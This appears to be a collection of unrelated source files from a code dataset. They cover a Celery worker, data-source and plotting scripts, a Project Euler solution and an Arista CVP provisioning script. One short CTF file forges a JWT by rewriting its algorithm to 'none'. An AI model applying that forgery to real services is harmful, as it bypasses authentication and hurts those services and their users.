%s\" % task\n for task in sorted(tasklist))\n\n def startup_info(self):\n tasklist = \"\"\n if self.loglevel <= logging.INFO:\n include_builtins = self.loglevel <= logging.DEBUG\n tasklist = self.tasklist(include_builtins=include_builtins)\n\n queues = self.defaults.get_queues()\n\n return STARTUP_INFO_FMT % {\n \"conninfo\": info.format_broker_info(),\n \"queues\": info.format_queues(queues, indent=8),\n \"concurrency\": self.concurrency,\n \"loglevel\": LOG_LEVELS[self.loglevel],\n \"logfile\": self.logfile or \"[stderr]\",\n \"celerybeat\": self.run_clockservice and \"ON\" or \"OFF\",\n \"events\": self.events and \"ON\" or \"OFF\",\n \"tasks\": tasklist,\n \"loader\": get_full_cls_name(self.loader.__class__),\n }\n\n def run_worker(self):\n if self.pidfile:\n pidlock = platforms.create_pidlock(self.pidfile).acquire()\n atexit.register(pidlock.release)\n worker = self.WorkController(concurrency=self.concurrency,\n loglevel=self.loglevel,\n logfile=self.logfile,\n hostname=self.hostname,\n ready_callback=self.on_listener_ready,\n embed_clockservice=self.run_clockservice,\n schedule_filename=self.schedule,\n send_events=self.events,\n db=self.db,\n max_tasks_per_child=self.max_tasks_per_child,\n task_time_limit=self.task_time_limit,\n task_soft_time_limit=self.task_soft_time_limit)\n self.install_platform_tweaks(worker)\n worker.start()\n\n def install_platform_tweaks(self, worker):\n \"\"\"Install platform specific tweaks and workarounds.\"\"\"\n if IS_OSX:\n self.osx_proxy_detection_workaround()\n\n # Install signal handler so SIGHUP restarts the worker.\n if not self._isatty:\n # only install HUP handler if detached from terminal,\n # so closing the terminal window doesn't restart celeryd\n # into the background.\n if IS_OSX:\n # OS X can't exec from a process using threads.\n # See http://github.com/ask/celery/issues#issue/152\n install_HUP_not_supported_handler(worker)\n else:\n install_worker_restart_handler(worker)\n install_worker_term_handler(worker)\n install_worker_int_handler(worker)\n signals.worker_init.send(sender=worker)\n\n def osx_proxy_detection_workaround(self):\n \"\"\"See http://github.com/ask/celery/issues#issue/161\"\"\"\n os.environ.setdefault(\"celery_dummy_proxy\", \"set_by_celeryd\")\n\n def set_process_status(self, info):\n info = \"%s (%s)\" % (info, platforms.strargv(sys.argv))\n return platforms.set_mp_process_title(\"celeryd\",\n info=info,\n hostname=self.hostname)\n\n def die(self, msg, exitcode=1):\n sys.stderr.write(\"Error: %s\\n\" % (msg, ))\n sys.exit(exitcode)\n\n\ndef install_worker_int_handler(worker):\n\n def _stop(signum, frame):\n process_name = multiprocessing.current_process().name\n if process_name == \"MainProcess\":\n worker.logger.warn(\n \"celeryd: Hitting Ctrl+C again will terminate \"\n \"all running tasks!\")\n install_worker_int_again_handler(worker)\n worker.logger.warn(\"celeryd: Warm shutdown (%s)\" % (\n process_name))\n worker.stop()\n raise SystemExit()\n\n platforms.install_signal_handler(\"SIGINT\", _stop)\n\n\ndef install_worker_int_again_handler(worker):\n\n def _stop(signum, frame):\n process_name = multiprocessing.current_process().name\n if process_name == \"MainProcess\":\n worker.logger.warn(\"celeryd: Cold shutdown (%s)\" % (\n process_name))\n worker.terminate()\n raise SystemExit()\n\n platforms.install_signal_handler(\"SIGINT\", _stop)\n\n\ndef install_worker_term_handler(worker):\n\n def _stop(signum, frame):\n process_name = multiprocessing.current_process().name\n if process_name == \"MainProcess\":\n 
worker.logger.warn(\"celeryd: Warm shutdown (%s)\" % (\n process_name))\n worker.stop()\n raise SystemExit()\n\n platforms.install_signal_handler(\"SIGTERM\", _stop)\n\n\ndef install_worker_restart_handler(worker):\n\n def restart_worker_sig_handler(signum, frame):\n \"\"\"Signal handler restarting the current python program.\"\"\"\n worker.logger.warn(\"Restarting celeryd (%s)\" % (\n \" \".join(sys.argv)))\n worker.stop()\n os.execv(sys.executable, [sys.executable] + sys.argv)\n\n platforms.install_signal_handler(\"SIGHUP\", restart_worker_sig_handler)\n\n\ndef install_HUP_not_supported_handler(worker):\n\n def warn_on_HUP_handler(signum, frame):\n worker.logger.error(\"SIGHUP not supported: \"\n \"Restarting with HUP is unstable on this platform!\")\n\n platforms.install_signal_handler(\"SIGHUP\", warn_on_HUP_handler)\n\n\ndef run_worker(*args, **kwargs):\n return Worker(*args, **kwargs).run()\n","sub_path":"celery/apps/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":12212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"549974967","text":"import json\nimport asyncio\nimport aiomysql\nfrom collections import OrderedDict\nfrom typing import AsyncIterator, NamedTuple, Dict\n\nfrom dffml.base import BaseConfig\nfrom dffml.repo import Repo\nfrom dffml.source.source import BaseSourceContext, BaseSource\nfrom dffml.util.cli.arg import Arg\nfrom dffml.util.entrypoint import entrypoint\n\n\nclass DemoAppSourceConfig(BaseConfig, NamedTuple):\n host: str\n port: int\n user: str\n password: str\n db: str\n\n\nclass DemoAppSourceContext(BaseSourceContext):\n async def update(self, repo: Repo):\n db = self.conn\n # Just dump it (if you want a setup the queries easily, then you need to\n # massage the columns in this table to your liking, and perhaps add more\n # tables.\n marshall = json.dumps(repo.dict())\n await db.execute(\n \"INSERT INTO ml_data (key, json) VALUES(%s, %s) \"\n \"ON DUPLICATE KEY UPDATE json = %s\",\n (repo.key, marshall, marshall),\n )\n self.logger.debug(\"updated: %s\", marshall)\n self.logger.debug(\"update: %s\", await self.repo(repo.key))\n\n async def repos(self) -> AsyncIterator[Repo]:\n await self.conn.execute(\"SELECT key FROM `status`\")\n keys = set(map(lambda row: row[0], await self.conn.fetchall()))\n await self.conn.execute(\"SELECT key FROM `ml_data`\")\n list(map(lambda row: keys.add(row[0]), await self.conn.fetchall()))\n for key in keys:\n yield await self.repo(key)\n\n async def repo(self, key: str):\n repo = Repo(key)\n db = self.conn\n # Get features\n await db.execute(\"SELECT json FROM ml_data WHERE key=%s\", (key,))\n dump = await db.fetchone()\n if dump is not None and dump[0] is not None:\n repo.merge(Repo(key, data=json.loads(dump[0])))\n await db.execute(\n \"SELECT maintained FROM `status` WHERE key=%s\", (key,)\n )\n maintained = await db.fetchone()\n if maintained is not None and maintained[0] is not None:\n repo.evaluated({\"maintained\": str(maintained[0])})\n return repo\n\n async def __aenter__(self) -> \"DemoAppSourceContext\":\n self.__conn = self.parent.db.cursor()\n self.conn = await self.__conn.__aenter__()\n return self\n\n async def __aexit__(self, exc_type, exc_value, traceback):\n await self.__conn.__aexit__(exc_type, exc_value, traceback)\n await self.parent.db.commit()\n\n\n@entrypoint(\"demoapp\")\nclass DemoAppSource(BaseSource):\n\n CONTEXT = DemoAppSourceContext\n\n async def __aenter__(self) -> \"DemoAppSource\":\n self.pool = await 
aiomysql.create_pool(\n host=self.config.host,\n port=self.config.port,\n user=self.config.user,\n password=self.config.password,\n db=self.config.db,\n )\n self.__db = self.pool.acquire()\n self.db = await self.__db.__aenter__()\n return self\n\n async def __aexit__(self, exc_type, exc_value, traceback):\n await self.__db.__aexit__(exc_type, exc_value, traceback)\n self.pool.close()\n await self.pool.wait_closed()\n\n @classmethod\n def args(cls, args, *above) -> Dict[str, Arg]:\n cls.config_set(args, above, \"host\", Arg(default=\"127.0.0.1\"))\n cls.config_set(args, above, \"port\", Arg(type=int, default=3306))\n cls.config_set(args, above, \"user\", Arg(default=\"user\"))\n cls.config_set(args, above, \"password\", Arg(default=\"pass\"))\n cls.config_set(args, above, \"db\", Arg(default=\"db\"))\n return args\n\n @classmethod\n def config(cls, config, *above):\n return DemoAppSourceConfig(\n host=cls.config_get(config, above, \"host\"),\n port=cls.config_get(config, above, \"port\"),\n user=cls.config_get(config, above, \"user\"),\n password=cls.config_get(config, above, \"password\"),\n db=cls.config_get(config, above, \"db\"),\n )\n","sub_path":"examples/maintained/demoapp/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"16647957","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nx1 = tf.constant([137.97, 104.50, 100.00, 124.32, 79.20, 99.00, 124.00, 114.00,\n 106.69, 138.05, 53.75, 46.91, 68.00, 63.02, 81.26, 86.21])\nx2 = tf.constant([3, 2, 2, 3, 1, 2, 3, 2, 2, 3, 1, 1, 1, 1, 2, 2],dtype = tf.float32)\ny = tf.constant([145.00, 110.00, 93.00, 116.00, 65.32, 104.00, 118.00, 91.00,\n 62.00, 133.00, 51.00, 45.00, 78.50, 69.65, 75.69, 95.30])\n\nx0 = tf.ones(len((x1)),dtype = tf.float32)\nX = tf.stack((x0,x1,x2),axis = 1)\nY = tf.reshape(y,(-1,1))\n\nXt = tf.transpose(X)\nXtX_1 = tf.linalg.inv(tf.matmul(Xt,X))\nXtX_1_Xt = tf.matmul(XtX_1,Xt)\nW = tf.matmul(XtX_1_Xt , Y)\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\n\nfig = plt.figure(figsize = (8,6))\nax3d = Axes3D(fig)\nax3d.scatter(x1,x2,y,color = \"b\",marker=\"*\")\n\nax3d.set_xlabel('Area',color = 'r',fontsize = 16)\nax3d.set_ylabel('Room',color = 'r' ,fontsize = 16)\nax3d.set_zlabel('Price',color = 'r' ,fontsize = 16)\nax3d.set_yticks([1,2,3])\nax3d.set_zlim3d(30,160)\n\nX1,X2 = tf.meshgrid(x1,x2)\nY_PRED = W[1] * X1 + W[2] * X2 + W[0]\n\nfig2 = plt.figure()\nax3d2 = Axes3D(fig2)\nax3d2.plot_surface(X1,X2,Y_PRED,cmap='coolwarm')\n\nax3d2.set_xlabel('Area',color = 'r',fontsize = 14)\nax3d2.set_ylabel('Room',color = 'r', fontsize = 14)\nax3d2.set_zlabel('Price',color = 'r', fontsize = 14)\nax3d2.set_yticks([1,2,3])\n\ny_pred = W[1] * x1 + W[2] * x2 + W[0]\nfig3 = plt.figure()\nax3d3 = Axes3D(fig3)\nax3d3.scatter(x1,x2,y,color='b',marker='*',label='销售记录')\nax3d3.scatter(x1,x2,y_pred,color = 'r',label = '预测房价')\nax3d3.plot_wireframe(X1,X2,Y_PRED,color='c',linewidths=0.5,label=\"拟合平面\")\nax3d3.set_xlabel('Area',color='r',fontsize= 14)\nax3d3.set_ylabel('Room',color = 'r',fontsize = 14)\nax3d3.set_zlabel('Price',color='r',fontsize=14)\nax3d3.set_yticks([1,2,3])\n\nplt.suptitle('商品房价销售回归模型',fontsize = 20)\nplt.legend(loc='upper left')\n\nplt.show()","sub_path":"housePrice2.py","file_name":"housePrice2.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"277154759","text":"from ShopSystem.models.gp_shop_base_models import *\nfrom portal.models.game import Game\nfrom ShopSystem.models.product import Product\n\n\nclass RelationGameProduct(BaseModel):\n game = ForeignKeyField(db_column='game_id', rel_model=Game, to_field='id')\n product = ForeignKeyField(db_column='product_id', rel_model=Product, to_field='id')\n\n class Meta:\n db_table = 'Relation_for_game_product'\n\n @staticmethod\n def add_game_to_shop(data_):\n RelationGameProduct.create(game=data_['game_id'], product=data_['product_id'])\n return True\n\n @staticmethod\n def status_game_in_product(game_id):\n try:\n product_id = RelationGameProduct.select().where(RelationGameProduct.game == game_id).get().product\n ret = {'success':True, 'shop_link':\"/introduction_game/\" + str(int(product_id.id))}\n except DoesNotExist:\n ret = {'success':False}\n return ret\n\nif __name__ == \"__main__\":\n pass","sub_path":"ShopSystem/models/RelationGameProduct.py","file_name":"RelationGameProduct.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"146734762","text":"import base64\n\n\njwt = b'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE1ODI1NjIwMTAsImlhdCI6MTU4MjU1ODQxMCwiaXNzIjoicmVjaXBlYm90IiwibmJmIjoxNTgyNTU4NDEwLCJzdWIiOiI2NzY4N2NmYS1kZDRkLTQ2ZDYtYWM3NS1jMWIzYWQ4YTBkZGQifQ.eJmbryEF7Cb7bo0c5wPc9LN3X3CZLo6e5xjg1Q-Hm_w'\nheader, payload, signature = jwt.split(b'.')\n\n# Replacing the ALGO and the payload username\nheader = base64.b64decode(header).replace(b'HS256', b'none')\npayload = base64.b64decode(payload + b'==')\n\nheader = base64.b64encode(header).strip().replace(b'=', b'')\npayload = base64.b64encode(payload).strip().replace(b'=', b'')\n\n# 'The algorithm 'none' is not supported'\nprint(header + b\".\" + payload + b\".\" + signature)\n","sub_path":"bsidessf2020ctf/recipes/jwt_none.py","file_name":"jwt_none.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"422727458","text":"'''\r\n문1) 다음과 같이 다중선형회귀방정식으로 모델의 예측치와 평균제곱오차를 계산하시오.\r\n 조건1> X변수 : 4개, Y변수 : 1개 \r\n 조건1> X변수 공급 데이터 : x_data = [[1.2,2.2,3.5,4.2]] - (1,4)\r\n 조건2> Y변수[정답] : Variable()이용 표준정규분포 난수 상수 1개 \r\n 조건3> a변수[기울기] : Variable()이용 표준정규분포 난수 상수 4개\r\n 조건4> b변수[절편] : Variable()이용 표준정규분포 난수 상수 1개 \r\n 조건5> model 예측치 : pred_Y = (X * a) + b \r\n -> 행렬곱 함수 적용 \r\n 조건6> model 손실함수 출력 \r\n -> 손실함수는 python 함수로 정의 : 함수명 -> loss_fn(err)\r\n\r\n<< 출력 예시 >> \r\na[기울기] = \r\n [[-2.063591 ]\r\n [ 0.10648511]\r\n [ 0.49105361]\r\n [ 0.00555888]]\r\nb[절편] = [[ 1.4659301]]\r\nY[정답] = [[-0.39188424]]\r\npred_Y[예측치] = [[ 0.96592301]]\r\nloss function = = 1.84364 \r\n'''\r\n\r\nimport tensorflow as tf \r\n\r\n# 1. 변수 정의 \r\nX = [[1.2,2.2,3.5,4.2]] # 공급 data\r\nY = tf.Variable(tf.random.normal([1])) # 출력 \r\na = tf.Variable(tf.random.normal([4, 1])) # 기울기(4,1) \r\nb = tf.Variable(tf.random.normal([1])) # 절편\r\n\r\n# 2. model 예측치/오차/손실함수 정의 \r\n\r\n# 3. 결과 출력 \r\n\r\n\r\n\r\n\r\n","sub_path":"chap03_LinearRegression/exams/exam01_regression_formula완성.py","file_name":"exam01_regression_formula완성.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"59682930","text":"##The primes 3, 7, 109, and 673, are quite remarkable. By taking any two primes\n##and concatenating them in any order the result will always be prime. 
For\n##example, taking 7 and 109, both 7109 and 1097 are prime. The sum of these four\n##primes, 792, represents the lowest sum for a set of four primes with this\n##property.\n##\n##Find the lowest sum for a set of five primes for which any two primes\n##concatenate to produce another prime.\n\nimport time\nfrom gmpy import is_prime\n\nstart = time.time()\n\nprimes = []\nfor i in range(3, 10000):\n if is_prime(i):\n primes.append(i)\n\n# tries both concatenations and returns True if both are primes\ndef concat_test(p1, p2):\n s1 = str(p1) + str(p2)\n if is_prime(int(s1)):\n s2 = str(p2) + str(p1)\n if is_prime(int(s2)):\n return True\n return False\n\ndef check_5(sofar, index):\n for i in range(index + 1, len(primes)):\n## print(sofar)\n works = True\n for p in sofar:\n if not concat_test(p, primes[i]):\n works = False\n break\n if works:\n temp = sofar[:]\n sofar.append(primes[i])\n if len(sofar) == 5:\n print(sum(sofar))\n print(time.time() - start) \n else:\n check_5(sofar, i)\n check_5(temp, i)\n\nprint(check_5([], 0))\n \n \n","sub_path":"code/Python/old/Euler/p60.py","file_name":"p60.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"598127656","text":"import matplotlib.pyplot as plt\nimport math\n\ndef get_variables():\n \"\"\"\n Asks a user for the values of gamma, omega0 and the number of points to \n plot on the graph.\n \"\"\"\n gamma = float(input(\"Please enter a value for gamma: \"))\n omega_zero = float(input(\"Please enter a value for omega: \"))\n points = int(input(\"Please enter the number of points to plot on the \" + \n \"graph: \"))\n \n return gamma, omega_zero, points\n\n\ndef shm(omega_zero, gamma, t):\n \"\"\"Calculates the displacement for a damped simple harmonic oscillator.\"\"\"\n # Checks if the oscillator is critically damped, hence gamma == 2*omega_zero\n if gamma == 2*omega_zero:\n # Calculates the coefficient of damping b for a critically damped \n # oscillator\n b = gamma/2\n return math.exp(-(gamma*t)/2)*(1+b*t)\n # Checks if the oscillator is over damped, hence gamma > 2*omega_zero\n elif gamma > 2*omega_zero:\n p = math.sqrt(((gamma**2)/4)-omega_zero**2)\n # Calculates the coefficient of damping b for an over damped\n # oscillator\n b = gamma/(2*p)\n return math.exp(-(gamma*t)/2)*(math.cosh(p*t)+b*math.sinh(p*t))\n # Checks if the oscillator is under damped, hence gamma < 2*omega_zero\n elif gamma < 2*omega_zero:\n omega = math.sqrt((omega_zero**2)-((gamma**2)/4))\n # Calculates the coefficient of damping b for an under damped\n # oscillator\n b = gamma/(2*omega)\n return math.exp(-(gamma*t)/2)*(math.cos(omega*t)+b*math.sin(omega*t))\n\n\ndef plot_amplitude_against_time(amplitudes, times, damping_type):\n \"\"\"Plots the amplitude of a damped oscillator against time.\"\"\"\n plt.plot(times, amplitudes, \"k\")\n plt.title(\"Amplitude vs Time for a%s Simple Harmonic Oscillator\" % \n (damping_type))\n plt.xlabel(\"Time(s)\")\n plt.ylabel(\"Amplitude x(t) (m)\")\n plt.show()\n\n\ndef main():\n \"\"\"The main method executes the main functionality of the program.\"\"\"\n gamma, omega_zero, points = get_variables()\n times = []\n amplitudes = []\n for i in range(0, points):\n # Calculates the time for each displacement.\n t = (5.0*math.pi*i/points)/omega_zero\n # Appends the current time to the list of times\n times.append(t)\n # Calculates the displacement at the current time and appends it to the \n # list of amplitudes\n amplitudes.append(shm(omega_zero, 
gamma, t))\n\n # Checks if the oscillator is critically damped in order to change the title\n # of the plot accordingly\n if gamma == 2*omega_zero:\n plot_amplitude_against_time(amplitudes, times, \" Critically Damped\")\n # Checks if the oscillator is over damped in order to change the title\n # of the plot accordingly\n elif gamma > 2*omega_zero:\n plot_amplitude_against_time(amplitudes, times, \"n Over Damped\")\n # Checks if the oscillator is under damped in order to change the title\n # of the plot accordingly\n elif gamma < 2*omega_zero:\n plot_amplitude_against_time(amplitudes, times, \"n Under Damped\") \n\nmain()","sub_path":"check_point_3.py","file_name":"check_point_3.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"274841254","text":"#!/usr/bin/env python3\n\nfrom ruamel.yaml import YAML\nfrom rcvpapi.rcvpapi import *\nimport requests, json, syslog\nfrom os import path, listdir, system\nfrom time import sleep\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\ntopo_file = '/etc/ACCESS_INFO.yaml'\nCVP_CONFIG_FILE = '/home/arista/.cvpState.txt'\nCVP_CONTAINERS = []\nFILE_DELAY = 10\n\n# Temporary file_path location for CVP Custom info\ncvp_file = '/home/arista/cvp/cvp_info.yaml'\npDEBUG = False\n\n# ==================================\n# Start of Global Functions\n# ==================================\ndef getTopoInfo(yaml_file):\n \"\"\"\n Function that parses the supplied YAML file to build the CVP topology.\n \"\"\"\n topoInfo = open(yaml_file,'r')\n topoYaml = YAML().load(topoInfo)\n topoInfo.close()\n return(topoYaml)\n\ndef checkContainer(cnt):\n \"\"\"\n Function to check and see if the supplied container is already in the global container list.\n Parameters:\n cnt = Container to add if it does not exist in the list (required)\n \"\"\"\n if cnt not in CVP_CONTAINERS:\n CVP_CONTAINERS.append(cnt)\n\ndef getEosDevice(topo,eosYaml,cvpMapper):\n \"\"\"\n Function that Parses through the YAML file and creates a CVPSWITCH class object for each EOS device in the topo file.\n Parameters:\n topo = Topology for the ATD (required)\n eosYAML = vEOS portion of the ACCESS_INFO.yaml file (required)\n cvpMapper = Dict that maps EOS device to container (required)\n \"\"\"\n EOS_DEV = []\n for dev in eosYaml:\n try:\n EOS_DEV.append(CVPSWITCH(dev['hostname'],dev['internal_ip'],cvpMapper[dev['hostname']]))\n checkContainer(cvpMapper[dev['hostname']])\n except:\n EOS_DEV.append(CVPSWITCH(dev['hostname'],dev['internal_ip']))\n return(EOS_DEV)\n\ndef eosContainerMapper(cvpYaml):\n \"\"\"\n Function that Parses through the YAML file and maps device to container.\n Parameters:\n cvpYaml = cvp containers portion of the cvp_info.yaml file (required)\n \"\"\"\n eMap = {}\n for cnt in cvpYaml.keys():\n if cvpYaml[cnt]:\n for eosD in cvpYaml[cnt]:\n eMap[eosD] = cnt\n return(eMap)\n\ndef pS(mstat,mtype):\n \"\"\"\n Function to send output from service file to Syslog\n Parameters:\n mstat = Message Status, ie \"OK\", \"INFO\" (required)\n mtype = Message to be sent/displayed (required)\n \"\"\"\n mmes = \"\\t\" + mtype\n syslog.syslog(\"[{0}] {1}\".format(mstat,mmes.expandtabs(7 - len(mstat))))\n if pDEBUG:\n print(\"[{0}] {1}\".format(mstat,mmes.expandtabs(7 - len(mstat))))\n\ndef main():\n \"\"\"\n Main Function if this is the initial deployment for the ATD/CVP\n \"\"\"\n cvp_clnt = \"\"\n while not path.exists(topo_file):\n sleep(FILE_DELAY)\n pS(\"INFO\", \"Topo 
file not found, waiting.\")\n while not path.exists(cvp_file):\n sleep(FILE_DELAY)\n pS(\"INFO\", \"CVP build file not found, waiting.\")\n atd_yaml = getTopoInfo(topo_file)\n cvp_yaml = getTopoInfo(cvp_file)\n eos_cnt_map = eosContainerMapper(cvp_yaml['cvp_info']['containers'])\n eos_info = getEosDevice(atd_yaml['topology'],atd_yaml['nodes']['veos'],eos_cnt_map)\n configlet_location = '/tmp/atd/topologies/{0}/configlets/'.format(atd_yaml['topology'])\n for c_login in atd_yaml['login_info']['cvp']['shell']:\n if c_login['user'] == 'arista':\n while not cvp_clnt:\n try:\n cvp_clnt = CVPCON(atd_yaml['nodes']['cvp'][0]['internal_ip'],c_login['user'],c_login['pw'])\n pS(\"OK\",\"Connected to CVP at {0}\".format(atd_yaml['nodes']['cvp'][0]['internal_ip']))\n except:\n pS(\"ERROR\",\"CVP is currently unavailable....Retrying in 30 seconds.\")\n sleep(30)\n if cvp_clnt:\n # ==========================================\n # Add configlets into CVP\n # ==========================================\n while not path.exists(configlet_location):\n sleep(FILE_DELAY)\n pS(\"INFO\", \"Configlets directory not found, waiting...\")\n if path.exists(configlet_location):\n pS(\"OK\",\"Configlet directory exists\")\n pro_cfglt = listdir(configlet_location)\n for tmp_cfg in pro_cfglt:\n if '.py' in tmp_cfg:\n pS(\"INFO\",\"Adding/Updating {0} configlet builder.\".format(tmp_cfg))\n cbname = tmp_cfg.replace('.py','')\n # !!! Add section to check for .form file to import form list options\n with open(configlet_location + tmp_cfg,'r') as cfglt:\n cvp_clnt.impConfiglet('builder',cbname,cfglt.read())\n elif '.form' in tmp_cfg:\n # Ignoring .form files here\n pass\n else:\n pS(\"INFO\",\"Adding/Updating {0} static configlet.\".format(tmp_cfg))\n with open(configlet_location + tmp_cfg,'r') as cfglt:\n cvp_clnt.impConfiglet('static',tmp_cfg,cfglt.read())\n else:\n pS(\"INFO\",\"No Configlet directory found\")\n # ==========================================\n # Add new containers into CVP\n # ==========================================\n for p_cnt in cvp_yaml['cvp_info']['containers'].keys():\n if p_cnt not in cvp_clnt.containers.keys():\n cvp_clnt.addContainer(p_cnt,\"Tenant\")\n cvp_clnt.saveTopology()\n cvp_clnt.getAllContainers()\n pS(\"OK\",\"Added {0} container\".format(p_cnt))\n else:\n pS(\"INFO\",\"{0} container already exists....skipping\".format(p_cnt))\n # Check and add configlets to containers\n if p_cnt in cvp_yaml['cvp_info']['configlets']['containers'].keys():\n cfgs_cnt_ignore = []\n proposed_cnt_cfgs = cvp_yaml['cvp_info']['configlets']['containers'][p_cnt]\n p_cnt_id = cvp_clnt.getContainerId(p_cnt)[0]['Key']\n existing_cnt_cfgs = cvp_clnt.getConfigletsByContainerId(p_cnt_id)\n if existing_cnt_cfgs:\n for ex_cfg in existing_cnt_cfgs['configletList']:\n if ex_cfg['name'] not in proposed_cnt_cfgs:\n cfgs_cnt_ignore.append(ex_cfg['name'])\n pS(\"OK\",\"Configlets found for {0} container. 
Will apply\".format(p_cnt))\n cvp_clnt.removeContainerConfiglets(p_cnt, cfgs_cnt_ignore)\n cvp_clnt.addContainerConfiglets(p_cnt, proposed_cnt_cfgs)\n cvp_clnt.applyConfigletsContainers(p_cnt)\n cvp_clnt.saveTopology()\n cvp_clnt.getAllTasks(\"pending\")\n task_response = cvp_clnt.execAllTasks(\"pending\")\n # Perform check to see if there are any existing tasks to be executed\n if task_response:\n pS(\"OK\", \"All pending tasks are executing\")\n for task_id in task_response['ids']:\n task_status = cvp_clnt.getTaskStatus(task_id)['taskStatus']\n while task_status != \"Completed\":\n task_status = cvp_clnt.getTaskStatus(task_id)['taskStatus']\n if task_status == 'Failed':\n pS(\"iBerg\", \"Task ID: {0} Status: {1}\".format(task_id, task_status))\n break\n elif task_status == 'Completed':\n pS(\"INFO\", \"Task ID: {0} Status: {1}\".format(task_id, task_status))\n break\n else:\n pS(\"INFO\", \"Task ID: {0} Status: {1}, Waiting 10 seconds...\".format(task_id, task_status))\n sleep(10)\n else:\n pS(\"INFO\", \"No pending tasks found\")\n # ==========================================\n # Update configlet info for all containers\n # ==========================================\n for p_cnt in cvp_clnt.containers:\n cvp_clnt.updateContainersConfigletsInfo(p_cnt)\n # ==========================================\n # Add devices to Inventory/Provisioning\n # ==========================================\n # Perform initial check and do a group add of devices\n tmp_eos_add = []\n for eos in eos_info:\n # Check to see if the device is already provisioned\n if eos.hostname not in cvp_clnt.inventory.keys():\n pS(\"INFO\",\"Adding {}\".format(eos.hostname))\n tmp_eos_add.append(eos.ip)\n else:\n pS(\"INFO\",\"{} is already added into Provisioning\".format(eos.hostname))\n if tmp_eos_add:\n # Import all devices not \n pS(\"INFO\",\"Importing devices: {0}\".format(\", \".join(tmp_eos_add)))\n cvp_clnt.addDeviceInventory(tmp_eos_add)\n for eos in eos_info:\n # Check to see if the device has a target container\n if eos.targetContainerName:\n pS(\"INFO\", \"{0} is the target container for {1}\".format(eos.targetContainerName, eos.hostname))\n eos.updateContainer(cvp_clnt)\n if eos.targetContainerName != eos.parentContainer[\"name\"]:\n pS(\"INFO\", \"Moving {0} from {1} to {2}\".format(eos.hostname, eos.parentContainer['name'], eos.targetContainerName))\n cvp_clnt.moveDevice(eos)\n try:\n cvp_clnt.genConfigBuilders(eos)\n except KeyError:\n pS(\"INFO\", \"No Configlet Builders Found for {0}\".format(eos.hostname))\n if cvp_yaml['cvp_info']['configlets']['netelements']:\n if eos.hostname in cvp_yaml['cvp_info']['configlets']['netelements']:\n eos_new_cfgs = cvp_yaml['cvp_info']['configlets']['netelements'][eos.hostname]\n # Check to see if there are any existing configlets applied\n tmp_eos_cfgs = cvp_clnt.getConfigletsByNetElementId(eos)\n if tmp_eos_cfgs:\n tmp_cfgs_remove = []\n for cfg in tmp_eos_cfgs['configletList']:\n if cfg['name'] not in eos_new_cfgs and cfg['name'] not in cvp_clnt.containers['Tenant']['configlets']['names'] and cfg['name'] not in cvp_clnt.containers[eos.targetContainerName]['configlets']['names']:\n tmp_cfgs_remove.append(cfg['name'])\n pS(\"INFO\", \"[{0}] Configlets to remove: {1}\".format(eos.hostname, \", \".join(tmp_cfgs_remove)))\n eos.removeConfiglets(cvp_clnt, tmp_cfgs_remove)\n cvp_clnt.addDeviceConfiglets(eos, eos_new_cfgs)\n cvp_clnt.applyConfiglets(eos)\n cvp_clnt.saveTopology()\n pS(\"OK\", \"Topology saved\")\n cvp_clnt.getAllTasks(\"pending\")\n task_response = 
cvp_clnt.execAllTasks(\"pending\")\n pS(\"OK\", \"All pending tasks are executing\")\n for task_id in task_response['ids']:\n task_status = cvp_clnt.getTaskStatus(task_id)['taskStatus']\n while task_status != \"Completed\":\n task_status = cvp_clnt.getTaskStatus(task_id)['taskStatus']\n if task_status == 'Failed':\n pS(\"iBerg\", \"Task ID: {0} Status: {1}\".format(task_id, task_status))\n break\n elif task_status == 'Completed':\n pS(\"INFO\", \"Task ID: {0} Status: {1}\".format(task_id, task_status))\n else:\n pS(\"INFO\", \"Task ID: {0} Status: {1}, Waiting 10 seconds...\".format(task_id, task_status))\n sleep(10)\n\n # ==========================================\n # Creating Snapshots\n # ==========================================\n if cvp_yaml['cvp_info']['snapshots']:\n for p_snap in cvp_yaml['cvp_info']['snapshots']:\n NEW_SNAP = True\n for e_snap in cvp_clnt.snapshots:\n if p_snap['name'] == e_snap['name']:\n NEW_SNAP = False\n if NEW_SNAP:\n cvp_clnt.createSnapshot(p_snap['name'],p_snap['commands'])\n pS(\"OK\",\"Created {0} Snapshot\".format(p_snap['name']))\n else:\n pS(\"OK\",\"Snapshot {0} already exists\".format(p_snap['name']))\n # Logout and close session to CVP\n cvp_clnt.execLogout()\n pS(\"OK\",\"Logged out of CVP\")\n # Adding section to reboot all vEOS nodes in case \n # multi-agent needs to initialize on initial deployment\n for eos in eos_info:\n pS(\"INFO\", \"Rebooting {0}\".format(eos.hostname))\n system(\"/usr/bin/ssh -f arista@{0} reload now\".format(eos.ip))\n pS(\"OK\", \"{0} has been rebooted.\".format(eos.hostname))\n else:\n pS(\"ERROR\",\"Couldn't connect to CVP\")\n\nif __name__ == '__main__':\n # Open Syslog\n syslog.openlog(logoption=syslog.LOG_PID)\n pS(\"OK\",\"Starting...\")\n\n atd_yaml = getTopoInfo(topo_file)\n if 'cvp' in atd_yaml['nodes']:\n if not 